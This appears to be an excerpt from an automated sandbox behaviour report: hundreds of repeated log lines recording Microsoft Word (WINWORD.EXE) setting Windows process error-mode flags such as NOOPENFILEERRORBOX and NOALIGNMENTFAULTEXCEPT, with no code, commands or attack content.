Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
